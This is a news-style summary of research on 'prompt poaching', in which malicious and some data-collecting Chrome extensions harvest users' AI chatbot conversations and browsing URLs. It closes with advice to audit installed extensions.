Security researchers have identified two malicious Chrome extensions that steal user conversations from ChatGPT and DeepSeek while monitoring general browsing activity. These extensions, which have nearly one million combined users, trick individuals into sharing data by posing as legitimate AI tools and sending the harvested information to remote servers.
Cybersecurity experts have uncovered a new threat known as prompt poaching where browser extensions are used to secretly exfiltrate AI chatbot interactions. Two specific malicious extensions, Chat GPT for Chrome and AI Sidebar, were found impersonating legitimate software to gain access to user data. These tools request permission for anonymous analytics but instead scrape full conversation histories and tab URLs every thirty minutes. This stolen information is then transmitted to unauthorized servers controlled by the attackers.
The risk extends beyond explicitly malicious software as some popular legitimate extensions have also begun collecting AI interaction data. Large-scale tools like Similarweb and Stayfocusd have reportedly updated their policies or technical capabilities to monitor the prompts and files users upload to services like Gemini, Claude, and Perplexity. These companies often claim the data is used for market research or traffic analysis, but the level of detail captured can include highly sensitive personal or corporate information.
Attackers and data collection firms use various technical methods to intercept this information, such as scraping the visual elements of a webpage or hijacking browser communication protocols. To hide their infrastructure, some threat actors even use AI-driven web development platforms to host their privacy policies and back-end systems. This makes it difficult for average users to distinguish between a helpful productivity tool and a data-harvesting operation designed for corporate espionage.
The consequences of these security breaches are significant because AI conversations often contain intellectual property, internal business strategies, or private personal details. Once this data is exfiltrated, it can be sold on underground forums or used to facilitate targeted phishing attacks and identity theft. Because extensions can see nearly everything a user does within a browser, the exposure often includes internal company URLs and specific search queries that were never intended for public view.
To protect against these privacy risks, users are encouraged to audit their installed browser extensions and remove any that are not strictly necessary. Even if an extension has a large user base or a featured badge in a web store, it may still engage in intrusive data collection practices. Experts suggest that individuals should be cautious when granting permissions for data collection and remain vigilant as more developers seek to monetize user interactions through these sophisticated scraping techniques.
Source: Two Chrome Extensions Steal ChatGPT And DeepSeek Chats From 900,000 Users


